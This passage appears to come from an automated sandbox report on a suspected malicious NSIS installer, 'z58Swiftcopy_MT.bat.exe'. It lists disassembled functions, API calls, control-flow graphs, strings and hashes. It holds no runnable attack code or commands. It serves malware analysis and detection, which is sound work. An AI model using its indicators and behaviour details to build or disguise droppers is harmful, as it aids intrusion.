                                                                                                                                                                                                                                        • Part of subcall function 004038E9: GetFileAttributesA.KERNEL32(Call), ref: 004039F7
                                                                                                                                                                                                                                        • Part of subcall function 004038E9: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne), ref: 00403A40
                                                                                                                                                                                                                                        • Part of subcall function 004038E9: RegisterClassA.USER32(00423EC0), ref: 00403A7D
                                                                                                                                                                                                                                        • Part of subcall function 004037F7: CloseHandle.KERNEL32(000002A8,C:\Users\user\AppData\Local\Temp\,0040362E,?,?,00000006,00000008,0000000A), ref: 00403809
                                                                                                                                                                                                                                        • Part of subcall function 004037F7: CloseHandle.KERNEL32(000002C8,C:\Users\user\AppData\Local\Temp\,0040362E,?,?,00000006,00000008,0000000A), ref: 0040381D
                                                                                                                                                                                                                                      • OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 0040362E
                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0040364F
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 0040376C
                                                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403773
                                                                                                                                                                                                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040378B
                                                                                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037AA
                                                                                                                                                                                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 004037CE
                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 004037F1
                                                                                                                                                                                                                                        • Part of subcall function 004057B5: MessageBoxIndirectA.USER32(0040A230), ref: 00405810
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HandleProcess$ExitFile$CloseEnvironmentModulePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCommandCurrentDefaultDeleteDirectoryErrorImageIndirectInfoInitializeLanguageLineLoadLookupMessageModeNextOpenPrivilegePrivilegesProcRegisterUninitializeUserValueVersionlstrcmpilstrcpyn
                                                                                                                                                                                                                                      • String ID: "$"C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe"$.tmp$1033$51052544$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$user32::EnumWindows(i r1 ,i 0)$~nsu
                                                                                                                                                                                                                                      • API String ID: 1129060429-3790880674
                                                                                                                                                                                                                                      • Opcode ID: 80222e2a1608f68e9a01e2d4467cb4f437ef41324d85fef8055a94e839ea45f6
                                                                                                                                                                                                                                      • Instruction ID: 629f98fd345f67a1e75e2db33264847053f345a98c6a7e8b50a39e9081f0102f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80222e2a1608f68e9a01e2d4467cb4f437ef41324d85fef8055a94e839ea45f6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 46C1E6702047506AD721AF759D89A2F3EACAB81706F45443FF581B61E2CB7C8A158B2F
                                                                                                                                                                                                                                      Function 00405861 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 159filestringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 407 405861-405887 call 405b1f 410 4058a0-4058a7 407->410 411 405889-40589b DeleteFileA 407->411 413 4058a9-4058ab 410->413 414 4058ba-4058ca call 406099 410->414 412 405a2a-405a2e 411->412 415 4058b1-4058b4 413->415 416 4059d8-4059dd 413->416 420 4058d9-4058da call 405a78 414->420 421 4058cc-4058d7 lstrcatA 414->421 415->414 415->416 416->412 419 4059df-4059e2 416->419 422 4059e4-4059ea 419->422 423 4059ec-4059f4 call 40639c 419->423 424 4058df-4058e2 420->424 421->424 422->412 423->412 430 4059f6-405a0a call 405a31 call 405819 423->430 428 4058e4-4058eb 424->428 429 4058ed-4058f3 lstrcatA 424->429 428->429 431 4058f8-405916 lstrlenA FindFirstFileA 428->431 429->431 445 405a22-405a25 call 4051c0 430->445 446 405a0c-405a0f 430->446 433 40591c-405933 call 405a5c 431->433 434 4059ce-4059d2 431->434 441 405935-405939 433->441 442 40593e-405941 433->442 434->416 436 4059d4 434->436 436->416 441->442 447 40593b 441->447 443 405943-405948 442->443 444 405954-405962 call 406099 442->444 448 40594a-40594c 443->448 449 4059ad-4059bf FindNextFileA 443->449 457 405964-40596c 444->457 458 405979-405984 call 405819 444->458 445->412 446->422 451 405a11-405a20 call 4051c0 call 405e78 446->451 447->442 448->444 453 40594e-405952 448->453 449->433 455 4059c5-4059c8 FindClose 449->455 451->412 453->444 453->449 455->434 457->449 460 40596e-405977 call 405861 457->460 467 4059a5-4059a8 call 4051c0 458->467 468 405986-405989 458->468 460->449 467->449 470 40598b-40599b call 4051c0 call 405e78 468->470 471 40599d-4059a3 468->471 470->449 471->449
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DeleteFileA.KERNELBASE(?,?,762D3410,762D2EE0,00000000), ref: 0040588A
                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00421D38,\*.*,00421D38,?,?,762D3410,762D2EE0,00000000), ref: 004058D2
                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0040A014,?,00421D38,?,?,762D3410,762D2EE0,00000000), ref: 004058F3
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,0040A014,?,00421D38,?,?,762D3410,762D2EE0,00000000), ref: 004058F9
                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(00421D38,?,?,?,0040A014,?,00421D38,?,?,762D3410,762D2EE0,00000000), ref: 0040590A
                                                                                                                                                                                                                                      • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004059B7
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 004059C8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • "C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe", xrefs: 00405861
                                                                                                                                                                                                                                      • \*.*, xrefs: 004058CC
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe"$\*.*
                                                                                                                                                                                                                                      • API String ID: 2035342205-3460820883
                                                                                                                                                                                                                                      • Opcode ID: e51b648568a1e5a9b47539b24ed2716d15288ef485a4508b80519d1c974b3528
                                                                                                                                                                                                                                      • Instruction ID: 1dcfc4082d76b88a8dbc056b088e655b37054d2965a561fc4bca86fefb361094
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e51b648568a1e5a9b47539b24ed2716d15288ef485a4508b80519d1c974b3528
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C51AF71900A04EADB22AB258C85BBF7A78DF42724F14817BF851B51D2D73C4982DF6E
                                                                                                                                                                                                                                      Function 00406725 Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 612 406725-40672a 613 40679b-4067b9 612->613 614 40672c-40675b 612->614 617 406d91-406da6 613->617 615 406762-406766 614->615 616 40675d-406760 614->616 619 406768-40676c 615->619 620 40676e 615->620 618 406772-406775 616->618 621 406dc0-406dd6 617->621 622 406da8-406dbe 617->622 624 406793-406796 618->624 625 406777-406780 618->625 619->618 620->618 623 406dd9-406de0 621->623 622->623 626 406de2-406de6 623->626 627 406e07-406e13 623->627 630 406968-406986 624->630 628 406782 625->628 629 406785-406791 625->629 633 406f95-406f9f 626->633 634 406dec-406e04 626->634 641 4065a9-4065b2 627->641 628->629 636 4067fb-406829 629->636 631 406988-40699c 630->631 632 40699e-4069b0 630->632 639 4069b3-4069bd 631->639 632->639 640 406fab-406fbe 633->640 634->627 637 406845-40685f 636->637 638 40682b-406843 636->638 642 406862-40686c 637->642 638->642 645 406960-406966 639->645 646 4069bf 639->646 647 406fc3-406fc7 640->647 643 406fc0 641->643 644 4065b8 641->644 649 406872 642->649 650 4067e3-4067e9 642->650 643->647 651 406664-406668 644->651 652 4066d4-4066d8 644->652 653 4065bf-4065c3 644->653 654 4066ff-406720 644->654 645->630 648 406904-40690e 645->648 655 406ad0-406add 646->655 656 40693b-40693f 646->656 663 406f53-406f5d 648->663 664 406914-406936 648->664 674 4067c8-4067e0 649->674 675 406f2f-406f39 649->675 665 40689c-4068a2 650->665 666 4067ef-4067f5 650->666 667 406f14-406f1e 651->667 668 40666e-406687 651->668 661 406f23-406f2d 652->661 662 4066de-4066f2 652->662 653->640 660 4065c9-4065d6 653->660 654->617 655->641 657 406945-40695d 656->657 658 406f47-406f51 656->658 657->645 658->640 660->643 670 4065dc-406622 660->670 661->640 673 4066f5-4066fd 662->673 663->640 664->655 671 406900 665->671 672 4068a4-4068c2 665->672 666->636 666->671 667->640 669 40668a-40668e 668->669 669->651 676 406690-406696 669->676 677 406624-406628 670->677 678 40664a-40664c 670->678 671->648 679 4068c4-4068d8 672->679 680 4068da-4068ec 672->680 673->652 673->654 674->650 675->640 681 4066c0-4066d2 676->681 682 406698-40669f 676->682 683 406633-406641 GlobalAlloc 677->683 684 40662a-40662d GlobalFree 677->684 686 40665a-406662 678->686 687 40664e-406658 678->687 685 4068ef-4068f9 679->685 680->685 681->673 688 4066a1-4066a4 GlobalFree 682->688 689 4066aa-4066ba GlobalAlloc 682->689 683->643 690 406647 683->690 684->683 685->665 691 4068fb 685->691 686->669 687->686 687->687 688->689 689->643 689->681 690->678 693 406881-406899 691->693 694 406f3b-406f45 691->694 693->665 694->640
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 33747ec9ccf1e96e03ed3acadba13ccb82446055e1a2ca0fa1c9679c5aff3799
                                                                                                                                                                                                                                      • Instruction ID: 4aa70ef1b53fe275c3baa8fcae8ec6f6e0a9bb882f540f469220498d10fac131
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 33747ec9ccf1e96e03ed3acadba13ccb82446055e1a2ca0fa1c9679c5aff3799
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E9F16671D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED456BB281D7785A9ACF44
                                                                                                                                                                                                                                      Function 0040639C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileA.KERNELBASE(762D3410,00422580,C:\,00405B62,C:\,C:\,00000000,C:\,C:\,762D3410,?,762D2EE0,00405881,?,762D3410,762D2EE0), ref: 004063A7
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 004063B3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                      • String ID: C:\
                                                                                                                                                                                                                                      • API String ID: 2295610775-3404278061
                                                                                                                                                                                                                                      • Opcode ID: 650a356e45ca360fc625af9c332ec7d5af07b83f4ad3dd0750b8552cb66ed4f4
                                                                                                                                                                                                                                      • Instruction ID: 7ad18ffb452888df832aaad39da4d842c40e8f76539fb63f13b43eacc156c169
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 650a356e45ca360fc625af9c332ec7d5af07b83f4ad3dd0750b8552cb66ed4f4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7CD012316050306BC20117386E0C84B7A5C9F053307119B37F9A6F12E0D7748CB286DD
                                                                                                                                                                                                                                      Function 004038E9 Relevance: 49.2, APIs: 14, Strings: 14, Instructions: 215stringregistryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 134 4038e9-403901 call 406431 137 403903-40390e GetUserDefaultUILanguage call 405ff7 134->137 138 403915-403946 call 405f80 134->138 141 403913 137->141 144 403948-403959 call 405f80 138->144 145 40395e-403964 lstrcatA 138->145 143 403969-403992 call 403bae call 405b1f 141->143 151 403998-40399d 143->151 152 403a19-403a21 call 405b1f 143->152 144->145 145->143 151->152 154 40399f-4039c3 call 405f80 151->154 158 403a23-403a2a call 4060bb 152->158 159 403a2f-403a54 LoadImageA 152->159 154->152 160 4039c5-4039c7 154->160 158->159 162 403ad5-403add call 40140b 159->162 163 403a56-403a86 RegisterClassA 159->163 164 4039d8-4039e4 lstrlenA 160->164 165 4039c9-4039d6 call 405a5c 160->165 176 403ae7-403af2 call 403bae 162->176 177 403adf-403ae2 162->177 166 403ba4 163->166 167 403a8c-403ad0 SystemParametersInfoA CreateWindowExA 163->167 171 4039e6-4039f4 lstrcmpiA 164->171 172 403a0c-403a14 call 405a31 call 406099 164->172 165->164 170 403ba6-403bad 166->170 167->162 171->172 175 4039f6-403a00 GetFileAttributesA 171->175 172->152 179 403a02-403a04 175->179 180 403a06-403a07 call 405a78 175->180 186 403af8-403b12 ShowWindow call 4063c3 176->186 187 403b7b-403b83 call 405292 176->187 177->170 179->172 179->180 180->172 192 403b14-403b19 call 4063c3 186->192 193 403b1e-403b30 GetClassInfoA 186->193 194 403b85-403b8b 187->194 195 403b9d-403b9f call 40140b 187->195 192->193 198 403b32-403b42 GetClassInfoA RegisterClassA 193->198 199 403b48-403b79 DialogBoxParamA call 40140b call 403839 193->199 194->177 200 403b91-403b98 call 40140b 194->200 195->166 198->199 199->170 200->177
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406431: GetModuleHandleA.KERNEL32(?,?,?,00403380,0000000A), ref: 00406443
                                                                                                                                                                                                                                        • Part of subcall function 00406431: GetProcAddress.KERNEL32(00000000,?), ref: 0040645E
                                                                                                                                                                                                                                      • GetUserDefaultUILanguage.KERNELBASE(00000002,762D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe",00000000), ref: 00403903
                                                                                                                                                                                                                                        • Part of subcall function 00405FF7: wsprintfA.USER32 ref: 00406004
                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(1033,00420D30,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D30,00000000,00000002,762D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe",00000000), ref: 00403964
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne,1033,00420D30,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D30,00000000,00000002,762D3410), ref: 004039D9
                                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(?,.exe), ref: 004039EC
                                                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(Call), ref: 004039F7
                                                                                                                                                                                                                                      • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne), ref: 00403A40
                                                                                                                                                                                                                                      • RegisterClassA.USER32(00423EC0), ref: 00403A7D
                                                                                                                                                                                                                                      • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403A95
                                                                                                                                                                                                                                      • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403ACA
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403B00
                                                                                                                                                                                                                                      • GetClassInfoA.USER32(00000000,RichEdit20A,00423EC0), ref: 00403B2C
                                                                                                                                                                                                                                      • GetClassInfoA.USER32(00000000,RichEdit,00423EC0), ref: 00403B39
                                                                                                                                                                                                                                      • RegisterClassA.USER32(00423EC0), ref: 00403B42
                                                                                                                                                                                                                                      • DialogBoxParamA.USER32(?,00000000,00403C86,00000000), ref: 00403B61
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe"$.DEFAULT\Control Panel\International$.exe$0B$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                      • API String ID: 606308-2139792627
                                                                                                                                                                                                                                      • Opcode ID: e3ec59447a3a5e7c0f5e833dcd66e45d6aae208e89073c804757ba1de371f7ae
                                                                                                                                                                                                                                      • Instruction ID: 64417a43097117c8645ac50bcac1ff1732ece6e83d5d80f238bcb810e00f0866
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e3ec59447a3a5e7c0f5e833dcd66e45d6aae208e89073c804757ba1de371f7ae
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8F61B770340604AED620AF65AD45F3B3A6CDB8575AF40453FF991B22E2CB7D9D028E2D
                                                                                                                                                                                                                                      Function 00402D98 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 207 402d98-402de6 GetTickCount GetModuleFileNameA call 405c32 210 402df2-402e20 call 406099 call 405a78 call 406099 GetFileSize 207->210 211 402de8-402ded 207->211 219 402f10-402f1e call 402cf9 210->219 220 402e26-402e3d 210->220 212 403037-40303b 211->212 226 402f24-402f27 219->226 227 402fef-402ff4 219->227 221 402e41-402e4e call 4032af 220->221 222 402e3f 220->222 231 402e54-402e5a 221->231 232 402fab-402fb3 call 402cf9 221->232 222->221 229 402f53-402f9f GlobalAlloc call 406556 call 405c61 CreateFileA 226->229 230 402f29-402f41 call 4032c5 call 4032af 226->230 227->212 257 402fa1-402fa6 229->257 258 402fb5-402fe5 call 4032c5 call 40303e 229->258 230->227 255 402f47-402f4d 230->255 235 402eda-402ede 231->235 236 402e5c-402e74 call 405bed 231->236 232->227 240 402ee0-402ee6 call 402cf9 235->240 241 402ee7-402eed 235->241 236->241 254 402e76-402e7d 236->254 240->241 246 402f00-402f0a 241->246 247 402eef-402efd call 4064e8 241->247 246->219 246->220 247->246 254->241 259 402e7f-402e86 254->259 255->227 255->229 257->212 267 402fea-402fed 258->267 259->241 261 402e88-402e8f 259->261 261->241 263 402e91-402e98 261->263 263->241 264 402e9a-402eba 263->264 264->227 266 402ec0-402ec4 264->266 268 402ec6-402eca 266->268 269 402ecc-402ed4 266->269 267->227 270 402ff6-403007 267->270 268->219 268->269 269->241 271 402ed6-402ed8 269->271 272 403009 270->272 273 40300f-403014 270->273 271->241 272->273 274 403015-40301b 273->274 274->274 275 40301d-403035 call 405bed 274->275 275->212
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00402DAC
                                                                                                                                                                                                                                      • GetModuleFileNameA.KERNELBASE(00000000,C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe,00000400), ref: 00402DC8
                                                                                                                                                                                                                                        • Part of subcall function 00405C32: GetFileAttributesA.KERNELBASE(00000003,00402DDB,C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe,80000000,00000003), ref: 00405C36
                                                                                                                                                                                                                                        • Part of subcall function 00405C32: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C58
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe,C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe,80000000,00000003), ref: 00402E11
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,0040A130), ref: 00402F58
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402FEF
                                                                                                                                                                                                                                      • soft, xrefs: 00402E88
                                                                                                                                                                                                                                      • C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe, xrefs: 00402DB2, 00402DC1, 00402DD5, 00402DF2
                                                                                                                                                                                                                                      • "C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe", xrefs: 00402D98
                                                                                                                                                                                                                                      • Null, xrefs: 00402E91
                                                                                                                                                                                                                                      • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FA1
                                                                                                                                                                                                                                      • Error launching installer, xrefs: 00402DE8
                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00402DA2, 00402F70
                                                                                                                                                                                                                                      • C:\Users\user\Desktop, xrefs: 00402DF3, 00402DF8, 00402DFE
                                                                                                                                                                                                                                      • Inst, xrefs: 00402E7F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
